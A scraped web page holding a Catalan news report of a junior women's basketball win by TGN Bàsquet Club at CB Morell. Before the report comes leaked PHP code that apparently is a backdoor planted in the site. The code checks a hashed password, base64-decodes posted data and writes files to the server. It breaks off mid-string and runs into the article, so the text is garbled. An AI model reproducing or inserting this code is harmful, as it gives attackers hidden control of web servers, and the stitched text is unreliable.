function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Dos triples de Mallol en l'últim minut atorguen la victòria al júnior femení B a la pista del CB Morell (56-59) - Tgn Bàsquet Club -

Dos triples de Mallol en l’últim minut atorguen la victòria al júnior femení B a la pista del CB Morell (56-59)

Updated: novembre 26, 2019

L’equip júnior femení B va aconseguir un triomf agònic a la pista del CB Morell en un partit amb constants alternances al marcador. Després d’un bon inici, les tarragonines no van saber mantenir el ritme i van cedir la batuta del partit al seu rival que, però, tampoc es va poder imposar gràcies a una intensitat més gran de les visitants que les va permetre marcar un parcial d’1-11 al llindar del descans (28-31). A la represa, el TGN Bàsquet va gaudir d’un màxim avantatge de 10 punts (30-40) però les imprecisions en atac van permetre a les locals refer-se i dominar per set punts de diferència quan faltaven cinc minuts de partit. Quan faltava un minut pel final, el resultat era de 56-53 però aleshores la bona defensa lila i el canell de Mallol des de la línia de tres punts amb dues dianes, van sentenciar.